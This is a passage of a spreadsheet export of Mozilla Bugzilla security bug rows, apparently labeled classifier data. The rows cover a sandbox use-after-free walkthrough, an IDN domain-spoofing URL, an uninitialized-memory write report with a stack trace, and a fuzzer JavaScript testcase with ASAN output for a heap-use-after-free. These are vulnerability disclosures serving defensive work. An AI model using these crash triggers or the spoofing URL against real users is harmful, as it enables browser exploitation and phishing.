   663:     result = AddTargetPeerInternal(process_info.process_handle(),
   664:                                    process_info.process_id(),
   665:                                    policy_base, last_error);
   666:     if (result != SBOX_ALL_OK) {
   667:       // This may fail in the same way as Job associated processes.
   668:       // crbug.com/480639.
   669:       SpawnCleanup(target);
   670:       return result;
   671:     }
   672:   }
   ...
   675:   return result;
   676: }
```
```
   688: ResultCode BrokerServicesBase::AddTargetPeerInternal(
   ...
   695:   HANDLE tmp_process_handle = INVALID_HANDLE_VALUE;
   696:   if (!::DuplicateHandle(::GetCurrentProcess(), peer_process_handle,
   697:                          ::GetCurrentProcess(), &amp;tmp_process_handle,
   698:                          SYNCHRONIZE, false, 0 /*no options*/)) {
   699:     *last_error = ::GetLastError();
   700:     return SBOX_ERROR_CANNOT_DUPLICATE_PROCESS_HANDLE;
   701:   }
   ...
   714: }
```
You can demonstrate the UAF using the debugger. To do so:
1. Start FF and attach a debugger to it.
2. Set a BP on `broker_services.cc` line 663. Also set a BP on `PolicyBase()::~PolicyBase()`
3. Open any webpage in FF.
4. When the line 663 BP fires, step into `AddTargetPeerInternal()`. Simulate an error from `DuplicateHandle()` by skipping lines 696-98, setting control to line 700, setting `*lastError` to `5` (or anything else except `0`, really), and stepping out of the function.
5. Step into `SpawnCleanup()` and notice that it does `delete target`. Note the value of `target` and open a memory window there.
6. Proceed. Eventually the reference count of the object that was pointed to by `policy_base` will reach 0, and something will call `PolicyBase()::~PolicyBase()` in the chrome process.
7. Step the loop and notice that `~PolicyBase()` calls `delete` on the address you noted in step 5, which, of course, the code no longer owns.
8. Step further and watch the mayhem.
Interestingly, `BrokerServicesBase::SpawnTarget()`'s author noticed that this UAF was possible (lines 667-68), but never fixed it.
I will report this bug upstream.
[1] An attacker might be able to cause this situation by, e.g., using a script to do fetches from many URLs concurrently.</t>
        </is>
      </c>
      <c r="X423" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="424">
      <c r="A424" t="n">
        <v>581156</v>
      </c>
      <c r="B424" t="inlineStr">
        <is>
          <t>2010-07-22 13:33:54 -0700</t>
        </is>
      </c>
      <c r="C424" t="inlineStr">
        <is>
          <t>Change talos-staging-master02's port back to 8010/9010</t>
        </is>
      </c>
      <c r="D424" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E424" t="n">
        <v>1</v>
      </c>
      <c r="F424" t="n">
        <v>1</v>
      </c>
      <c r="G424" t="n">
        <v>5</v>
      </c>
      <c r="H424" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I424" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J424" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K424" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L424" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M424" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N424" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O424" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P424" t="inlineStr"/>
      <c r="Q424" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R424" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S424" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T424" t="n">
        <v>1</v>
      </c>
      <c r="U424" t="n">
        <v>0</v>
      </c>
      <c r="V424" t="n">
        <v>2</v>
      </c>
      <c r="W424" t="inlineStr">
        <is>
          <t>We are sending sendchanges to talos-staging-master02.build.mozilla.org:9010 but our we are not listening to the right port.
http://production-master01.build.mozilla.org:8010/builders/Linux%20electrolysis%20build/builds/32/steps/sendchange_10/logs/stdio</t>
        </is>
      </c>
      <c r="X424" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="425">
      <c r="A425" t="n">
        <v>1393624</v>
      </c>
      <c r="B425" t="inlineStr">
        <is>
          <t>2017-08-24 15:32:33 -0700</t>
        </is>
      </c>
      <c r="C425" t="inlineStr">
        <is>
          <t>Domain spoofing thanks to U+0620 ARABIC LETTER rendered as 'space' on Mac OS</t>
        </is>
      </c>
      <c r="D425" t="inlineStr">
        <is>
          <t>2024-05-30 09:36:14 -0700</t>
        </is>
      </c>
      <c r="E425" t="n">
        <v>1</v>
      </c>
      <c r="F425" t="n">
        <v>1</v>
      </c>
      <c r="G425" t="n">
        <v>2</v>
      </c>
      <c r="H425" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I425" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J425" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K425" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L425" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M425" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N425" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O425" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P425" t="inlineStr">
        <is>
          <t>[adv-main56+][adv-esr52.4+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q425" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R425" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S425" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T425" t="n">
        <v>0</v>
      </c>
      <c r="U425" t="n">
        <v>0</v>
      </c>
      <c r="V425" t="n">
        <v>17</v>
      </c>
      <c r="W425" t="inlineStr">
        <is>
          <t>Created attachment 8900936
Screen Shot 2017-08-24 at 23.31.13.png
After reporting issue 1390980 which is fixed in version 57.0a1 Nightly, we have found another character (https://www.compart.com/en/unicode/U+0620) looks like a 'space' on Mac OS
http://important-domain.google.com.xn--fgbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.bntk.pl/</t>
        </is>
      </c>
      <c r="X425" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="426">
      <c r="A426" t="n">
        <v>749385</v>
      </c>
      <c r="B426" t="inlineStr">
        <is>
          <t>2012-04-26 14:22:04 -0700</t>
        </is>
      </c>
      <c r="C426" t="inlineStr">
        <is>
          <t>Use deferred release for documents in nsHTMLDocumentSH::ReleaseDocument</t>
        </is>
      </c>
      <c r="D426" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E426" t="n">
        <v>1</v>
      </c>
      <c r="F426" t="n">
        <v>1</v>
      </c>
      <c r="G426" t="n">
        <v>3</v>
      </c>
      <c r="H426" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I426" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J426" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K426" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L426" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M426" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N426" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O426" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P426" t="inlineStr">
        <is>
          <t>[qa-][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q426" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R426" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S426" t="inlineStr">
        <is>
          <t>mozilla16</t>
        </is>
      </c>
      <c r="T426" t="n">
        <v>1</v>
      </c>
      <c r="U426" t="n">
        <v>0</v>
      </c>
      <c r="V426" t="n">
        <v>23</v>
      </c>
      <c r="W426" t="inlineStr">
        <is>
          <t>There are a couple classes in nsDOMClassInfo.cpp that have a finalizer that calls the Release function on a document. We've had trouble with situations like this before, since the destructor can possible cause JS code to run. These calls should use deferred release.</t>
        </is>
      </c>
      <c r="X426" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="427">
      <c r="A427" t="n">
        <v>1166082</v>
      </c>
      <c r="B427" t="inlineStr">
        <is>
          <t>2015-05-18 15:29:44 -0700</t>
        </is>
      </c>
      <c r="C427" t="inlineStr">
        <is>
          <t>CairoTextureClientD3D9::BorrowDrawTarget  using uninitialized memory</t>
        </is>
      </c>
      <c r="D427" t="inlineStr">
        <is>
          <t>2024-05-30 09:01:12 -0700</t>
        </is>
      </c>
      <c r="E427" t="n">
        <v>1</v>
      </c>
      <c r="F427" t="n">
        <v>1</v>
      </c>
      <c r="G427" t="n">
        <v>3</v>
      </c>
      <c r="H427" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I427" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J427" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K427" t="inlineStr">
        <is>
          <t>36 Branch</t>
        </is>
      </c>
      <c r="L427" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M427" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N427" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O427" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P427" t="inlineStr">
        <is>
          <t>[adv-main39+][adv-esr38.1+]</t>
        </is>
      </c>
      <c r="Q427" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R427" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S427" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T427" t="n">
        <v>1</v>
      </c>
      <c r="U427" t="n">
        <v>0</v>
      </c>
      <c r="V427" t="n">
        <v>22</v>
      </c>
      <c r="W427" t="inlineStr">
        <is>
          <t>Security received the following email of a bug submission.
Subject: Security exploit submission
Date: Mon, 18 May 2015 15:05:20 -0700
From: Ron &lt;q1@lastland.net&gt;
To: security@mozilla.org
Greetings.
I have found a bug that causes Firefox to attempt to write to an address 
that is obtained from an area of the stack below the current stack 
pointer (i.e. uninitialized memory). This area of the stack usually 
contains the address of executable code (and thus writing to this 
address usually causes a crash, since code is write-protected), but the 
stack could, depending upon the path taken into the defective code, 
contain other addresses that could make this bug exploitable.
The bug is in CairoTextureClientD3D9::BorrowDrawTarget (line 695 of the 
38.0.1 version of gfx/layers/d3d9/TextureD3D9.cpp). This function calls 
mD3D9Surface -&gt; LockRect (&amp;rect, nullptr, 0) (which is the Windows 
DirectX9 function LockRect). If this call fails (as it does sometimes 
when many tabs are open under Windows XP SP3 32 bit), LockRect leaves 
rect uninitialized. However, BorrowDrawTarget does not check the return 
status, instead using the uninitialized rect to create a new 
gfxImageSurface.
Other code later uses the new gfxImageSurface. Typically this occurs via 
a call stack similar to the following (from Firefox 36.0.1), and a crash 
occurs while attempting to write to code at the address 0x2129cbd, but 
other code paths are possible, some of which probably permit an attacker 
to write arbitrary data into Firefox's address space.
*1      xul.dll!sse2_fill(pixman_implementation_t * imp=0x0955b000, 
unsigned int * bits=0x02129cbd, int stride=0x06561e66, int 
bpp=0x00000020, int x=0x00000000, int y=0x00000000, int 
width=0x00000010, int height=0x00000293, unsigned int filler=0x00000000)
 2      xul.dll!_composite_boxes(_cairo_image_surface * dst=0x00000040, 
_cairo_operator op=0x02129cbd, const _cairo_pattern * 
pattern=0x03156508, _cairo_boxes_t * boxes=0x0012e0f8, _cairo_antialias 
antialias=CAIRO_ANTIALIAS_NONE, _cairo_clip * clip=0x0012e11c, const 
_cairo_composite_rectangles * extents=0x0012e0b0)
 3      xul.dll!_clip_and_composite_boxes(_cairo_image_surface * 
dst=0x00000040, _cairo_operator op=0x02129cbd, const _cairo_pattern * 
src=0x03156508, _cairo_boxes_t * boxes=0x0012e0f8, _cairo_antialias 
antialias=CAIRO_ANTIALIAS_NONE, _cairo_composite_rectangles * 
extents=0x0012e0b0, _cairo_clip * clip=0x00000000)
  4      xul.dll!_cairo_image_surface_fill(void * 
abstract_surface=0x2b6d22f0, _cairo_operator op=CAIRO_OPERATOR_CLEAR, 
const _cairo_pattern * source=0x03156508, _cairo_path_fixed * 
path=0x17d662d4, _cairo_fill_rule fill_rule=CAIRO_FILL_RULE_WINDING, 
double tolerance=0.10000000000000001, _cairo_antialias 
antialias=CAIRO_ANTIALIAS_NONE, _cairo_clip * clip=0x0012e784)
 5      xul.dll!_cairo_surface_fill(_cairo_surface * 
surface=0x00000040, _cairo_operator op=0x02129cbd, const _cairo_pattern 
* source=0x03156508, _cairo_path_fixed * path=0x17d662d4, 
_cairo_fill_rule fill_rule=CAIRO_FILL_RULE_WINDING, double 
tolerance=0.10000000000000001, _cairo_antialias 
antialias=CAIRO_ANTIALIAS_NONE, _cairo_clip * clip=0x0012e784)
 6      xul.dll!_moz_cairo_fill_preserve(_cairo * cr=0x00000040)
 7      xul.dll!mozilla::gfx::DrawTargetCairo::ClearRect(const 
mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits&gt; &amp; aRect={...})
 8 
xul.dll!mozilla::layers::RotatedContentBuffer::BorrowDrawTargetForPainting(mozilla::layers::RotatedContentBuffer::PaintState 
&amp; aPaintState={...},
 9      xul.dll!mozilla::layers::ClientPaintedLayer::PaintThebes()
 10 
xul.dll!mozilla::layers::ClientPaintedLayer::RenderLayerWithReadback(mozilla::layers::ReadbackProcessor 
* aReadback=0x0012eb14)
 11     xul.dll!mozilla::layers::ClientContainerLayer::RenderLayer()
 12 
xul.dll!mozilla::layers::ClientLayer::RenderLayerWithReadback(mozilla::layers::ReadbackProcessor 
* aReadback=0x0012eb74)
 13     xul.dll!mozilla::layers::ClientContainerLayer::RenderLayer()
 14 
xul.dll!mozilla::layers::ClientLayer::RenderLayerWithReadback(mozilla::layers::ReadbackProcessor 
* aReadback=0x0012ebd4)
 15     xul.dll!mozilla::layers::ClientContainerLayer::RenderLayer()
 16 
xul.dll!mozilla::layers::ClientLayerManager::EndTransactionInternal(void 
(mozilla::layers::PaintedLayer *, gfxContext *, const nsIntRegion &amp;, 
mozilla::layers::DrawRegionClip, const nsIntRegion &amp;, void *)* 
aCallback=0x016f9a43, void * aCallbackData=0x0012f0a0, 
mozilla::layers::LayerManager::EndTransactionFlags __formal=0x0012ecb4)
 17 xul.dll!mozilla::layers::ClientLayerManager::EndTransaction(void 
(mozilla::layers::PaintedLayer *, gfxContext *, const nsIntRegion &amp;, 
mozilla::layers::DrawRegionClip, const nsIntRegion &amp;, void *)* 
aCallback=0x016f9a43, void * aCallbackData=0x0012f0a0, 
mozilla::layers::LayerManager::EndTransactionFlags aFlags=END_DEFAULT)
 18     xul.dll!nsDisplayList::PaintRoot(nsDisplayListBuilder * 
aBuilder=0x0012f0a0, nsRenderingContext * aCtx=0x00000000, unsigned int 
aFlags=0x0000000d)
 19     xul.dll!nsLayoutUtils::PaintFrame(nsRenderingContext * 
aRenderingContext=0x00000040, nsIFrame * aFrame=0x02129cbd, const 
nsRegion &amp; aDirtyRegion={...}, unsigned int aBackstop=0xffffffff, 
unsigned int aFlags=0x00000304)
 20     xul.dll!PresShell::Paint(nsView * aViewToPaint=0x0e215830, 
const nsRegion &amp; aDirtyRegion={...}, unsigned int aFlags=0x00000001)
 21     xul.dll!nsViewManager::ProcessPendingUpdatesPaint(nsIWidget * 
aWidget=0x0c136800)
 22     xul.dll!nsViewManager::ProcessPendingUpdatesForView(nsView * 
aView=0x0e215830, bool aFlushDirtyRegion=true)
 23     xul.dll!nsViewManager::ProcessPendingUpdates()
 24     xul.dll!nsRefreshDriver::Tick(__int64 
aNowEpoch=0x****************, mozilla::TimeStamp aNowTime={...})
 25     xul.dll!mozilla::RefreshDriverTimer::Tick()
 26     xul.dll!nsTimerImpl::Fire()
 27     xul.dll!nsTimerEvent::Run()
 28     xul.dll!nsThread::ProcessNextEvent(bool aMayWait=false, bool * 
aResult=0x0012fa44)
 29 xul.dll!mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate 
* aDelegate=0x03e66101)
 30     xul.dll!MessageLoop::RunHandler()
 31     xul.dll!MessageLoop::Run()
 32     xul.dll!nsBaseAppShell::Run()
 33     xul.dll!nsAppShell::Run()
 34     xul.dll!nsAppStartup::Run()
 35     xul.dll!XREMain::XRE_mainRun()
 36     xul.dll!XREMain::XRE_main(int argc=0x00000003, char * * 
argv=0x00154890, const nsXREAppData * aAppData=0x0012fd80)
 37     xul.dll!XRE_main(int argc=0x00000003, char * * argv=0x00154890, 
const nsXREAppData * aAppData=0x0012fd80, unsigned int aFlags=0x00000000)
 38     firefox.exe!do_main(int argc=0x00000040, char * * 
argv=0x02129cbd, nsIFile * xreDirectory=0x03e401c0)
 39     firefox.exe!NS_internal_main(int argc=0x00000040, char * * 
argv=0x02129cbd)
 40     firefox.exe!wmain(int argc=0x00154890, wchar_t * * 
argv=0x00154a08)
 41     firefox.exe!__tmainCRTStartup()
...
I have reproduced this crash in Firefox 36.0.1 under Windows XP SP3 
32-bit. Reproduction typically requires creating ~200 tabs initialized 
with assorted URLs (not all of which need to be loaded), then just 
switching between windows/tabs until Firefox crashes. The crash is more 
likely after sleeping or hibernating the computer for ~30 min. The crash 
also occurs more frequently under Firefox 36.0.
I have not yet reproduced this crash under the latest Firefox (38.0.1), 
but I have verified that the buggy code in 
CairoTextureClientD3D9::BorrowDrawTarget exists and is executed in that 
version, and that manually modifying the returned rect causes a crash 
just like the one in 36.0.1. Perhaps some other change has been made 
that makes it less likely that the LockRect call in BorrowDrawTarget 
will fail?
Crashes resulting from this bug might have been reported at 
https://bugzilla.mozilla.org/show_bug.cgi?id=1111301 (it's hard to 
tell), but no one else appears to have diagnosed the bug, so it seems 
that it is eligible for the bug bounty.
Sincerely,
Ronald Crane
Independent Security Researcher</t>
        </is>
      </c>
      <c r="X427" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="428">
      <c r="A428" t="n">
        <v>678818</v>
      </c>
      <c r="B428" t="inlineStr">
        <is>
          <t>2011-08-14 06:07:12 -0700</t>
        </is>
      </c>
      <c r="C428" t="inlineStr">
        <is>
          <t>"ASSERTION: Window still registered with device motion" and crash</t>
        </is>
      </c>
      <c r="D428" t="inlineStr">
        <is>
          <t>2012-01-19 10:45:51 -0800</t>
        </is>
      </c>
      <c r="E428" t="n">
        <v>1</v>
      </c>
      <c r="F428" t="n">
        <v>1</v>
      </c>
      <c r="G428" t="n">
        <v>3</v>
      </c>
      <c r="H428" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I428" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J428" t="inlineStr">
        <is>
          <t>DOM: Events</t>
        </is>
      </c>
      <c r="K428" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L428" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M428" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N428" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O428" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P428" t="inlineStr">
        <is>
          <t>[sg:critical?][qa-]</t>
        </is>
      </c>
      <c r="Q428" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R428" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S428" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T428" t="n">
        <v>1</v>
      </c>
      <c r="U428" t="n">
        <v>0</v>
      </c>
      <c r="V428" t="n">
        <v>10</v>
      </c>
      <c r="W428" t="inlineStr">
        <is>
          <t>Created attachment 552965
testcase (crashes Firefox after closed)
Steps to reproduce:
1. Load the testcase.
2. Quit Firefox. (Or, close the tab and click the MP button in about:memory.)
Result: 
An assertion fails during GC:
###!!! ASSERTION: Window still registered with device motion.: '!mHasDeviceMotion', file dom/base/nsGlobalWindow.cpp, line 1039
Which is soon followed by:
Invalid read of freed memory [@ nsDeviceMotion::DeviceMotionChanged] in order to make a virtual function call.
(Beware: bp-4cdef108-d00e-4b39-8e21-d86152110813 makes it look like a null deref, but it is actually a more serious bug.)</t>
        </is>
      </c>
      <c r="X428" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="429">
      <c r="A429" t="n">
        <v>1387427</v>
      </c>
      <c r="B429" t="inlineStr">
        <is>
          <t>2017-08-04 06:24:26 -0700</t>
        </is>
      </c>
      <c r="C429" t="inlineStr">
        <is>
          <t>heap-use-after-free in txNameTest::matches</t>
        </is>
      </c>
      <c r="D429" t="inlineStr">
        <is>
          <t>2024-05-30 09:35:46 -0700</t>
        </is>
      </c>
      <c r="E429" t="n">
        <v>1</v>
      </c>
      <c r="F429" t="n">
        <v>1</v>
      </c>
      <c r="G429" t="n">
        <v>3</v>
      </c>
      <c r="H429" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I429" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J429" t="inlineStr">
        <is>
          <t>XSLT</t>
        </is>
      </c>
      <c r="K429" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L429" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M429" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N429" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O429" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P429" t="inlineStr">
        <is>
          <t>[adv-main58+][adv-esr52.6+]</t>
        </is>
      </c>
      <c r="Q429" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R429" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S429" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T429" t="n">
        <v>1</v>
      </c>
      <c r="U429" t="n">
        <v>0</v>
      </c>
      <c r="V429" t="n">
        <v>48</v>
      </c>
      <c r="W429" t="inlineStr">
        <is>
          <t>Created attachment 8893797
ASAN output
The following testcase crashes the latest ASAN build of Firefox (57.0a1, BuildID=20170803031846). It requires the attached ctop.xsl, mathml.xsl, math.xml and pmathml.xsl
&lt;script&gt;
function start() {
	o0=document;
	document.documentElement.innerHTML="";;
	o16=o0.createElement('iframe');
	o16.src='math.xml';
	o19=o0.createElement('element');
	o22=document.documentElement.querySelector('*:not([id])');
	document.documentElement.appendChild(o16);
	o33=o0.createElement('marquee');
	o33.addEventListener('DOMAttrModified',fun0);
	o33.style.objectPosition='341cm';
}
function fun0() {
	o16.src='javascript:window.top.fun1(document)';
	o39=o0.createElement('style');
	o22.appendChild(o39);
}
function fun1(a) {
	o52=a;
	o53=o52.querySelector('*:not([id])');
	o53.id='id7';
	o39.replaceWith(undefined,o19);
	o79=o52.querySelector('*:not([id])');
	o19.innerHTML='&lt;script&gt;window.top.fun2()&lt;/'+'script&gt;';
	o79.before(o22);
}
function fun2() {
	o53.textContent="a";
	fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN ouput:
=================================================================
==6027==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c000195f5c at pc 0x7fe871141b2e bp 0x7fffeab00210 sp 0x7fffeab00208
READ of size 4 at 0x60c000195f5c thread T0 (Web Content)
    #0 0x7fe871141b2d in GetBoolFlag /home/worker/workspace/build/src/obj-firefox/dist/include/nsINode.h:1602:12
    #1 0x7fe871141b2d in IsElement /home/worker/workspace/build/src/obj-firefox/dist/include/nsINode.h:440
    #2 0x7fe871141b2d in isElement /home/worker/workspace/build/src/dom/xslt/xpath/txXPathTreeWalker.h:225
    #3 0x7fe871141b2d in txNameTest::matches(txXPathNode const&amp;, txIMatchContext*, bool&amp;) /home/worker/workspace/build/src/dom/xslt/xpath/txNameTest.cpp:31
    #4 0x7fe87114b2f5 in txPredicatedNodeTest::matches(txXPathNode const&amp;, txIMatchContext*, bool&amp;) /home/worker/workspace/build/src/dom/xslt/xpath/txPredicatedNodeTest.cpp:24:30
    #5 0x7fe8711d1e86 in txStepPattern::matches(txXPathNode const&amp;, txIMatchContext*, bool&amp;) /home/worker/workspace/build/src/dom/xslt/xslt/txXSLTPatterns.cpp:438:30
    #6 0x7fe8711b3514 in txStylesheet::findTemplate(txXPathNode const&amp;, txExpandedName const&amp;, txIMatchContext*, txStylesheet::ImportFrame*, txInstruction**, txStylesheet::ImportFrame**) /home/worker/workspace/build/src/dom/xslt/xslt/txStylesheet.cpp:133:45
    #7 0x7fe87117045a in txApplyTemplates::execute(txExecutionState&amp;) /home/worker/workspace/build/src/dom/xslt/xslt/txInstructions.cpp:85:26
    #8 0x7fe8711d347d in txXSLTProcessor::execute(txExecutionState&amp;) /home/worker/workspace/build/src/dom/xslt/xslt/txXSLTProcessor.cpp:49:21
    #9 0x7fe87119ce9a in txMozillaXSLTProcessor::TransformToDoc(nsIDOMDocument**, bool) /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:679:14
    #10 0x7fe8711aded3 in nsTransformBlockerEvent::Run() /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:562:17
    #11 0x7fe86afd64ce in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1446:14
    #12 0x7fe86afdc748 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:480:10
    #13 0x7fe86bdee181 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #14 0x7fe86bd4b64b in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #15 0x7fe86bd4b64b in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #16 0x7fe86bd4b64b in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #17 0x7fe87159c08f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #18 0x7fe875873c77 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:882:22
    #19 0x7fe86bd4b64b in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #20 0x7fe86bd4b64b in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #21 0x7fe86bd4b64b in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #22 0x7fe8758736e0 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:699:34
    #23 0x4eb843 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #24 0x4eb843 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:285
    #25 0x7fe8888e182f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291
    #26 0x41d198 in _start (/home/nils/fuzzer3/firefox/firefox+0x41d198)
0x60c000195f5c is located 28 bytes inside of 128-byte region [0x60c000195f40,0x60c000195fc0)
freed by thread T0 (Web Content) here:
    #0 0x4bb6cb in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7fe86ae71547 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2658:25
    #2 0x7fe86ae7870b in FreeSnowWhite /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2846:3
    #3 0x7fe86ae7870b in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3850
    #4 0x7fe86ae77c23 in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3671:9
    #5 0x7fe86ae7b950 in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4208:21
    #6 0x7fe86dd5d77d in nsJSContext::CycleCollectNow(nsICycleCollectorListener*) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1670:3
    #7 0x7fe86d8a297b in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1410:3
    #8 0x7fe86aff5bf1 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:129
    #9 0x7fe86c8c91a0 in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1996:12
    #10 0x7fe86c8c91a0 in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1315
